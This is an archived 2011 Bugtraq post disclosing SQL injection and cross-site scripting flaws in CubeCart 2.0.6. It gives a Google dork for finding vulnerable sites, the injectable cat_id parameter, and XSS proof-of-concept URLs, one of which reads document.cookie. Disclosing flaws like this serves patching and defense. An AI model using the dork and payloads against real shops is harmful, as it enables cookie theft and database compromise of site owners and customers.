| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 2 Mar 2011 10:19:08 -0700 From: Root@...y.com To: bugtraq@...urityfocus.com Subject: CubeCart 2.0.6 SQL injection / Cross Site Scripting ########################################################## # Exploit Title: CubeCart 2.0.6 SQL injection / Cross Site Scripting # Google Dork: "Powered by CubeCart 2.0.6" # home : http://www.D99Y.com # Date: 2/3/2011 # Author: NassRawI # Software Link: http://www.cubecart.com # Version: 2.0.6 ########################################################## # # [1] SQL injection # # file : # # index.php # # exploit : # # http://localhost/index.php?cat_id= [ SQL injection ] # # [2] Cross Site Scripting # # file : # # sale_cat.php # # exploit : # # http://localhost/sale_cat.php/" [ XSS ] # # http://localhost/sale_cat.php/"<script>alert(12345)</script> # # http://localhost/sale_cat.php/"<script>alert(document.cookie)</script> # # ########################################################## Greetz : D99Y Team + alroo7 alte no tkda3 + moot almsh3er + mahmoudvip + ‏Difficult 511 and all members D99Y.CoM Enjoy :)
Powered by blists - more mailing lists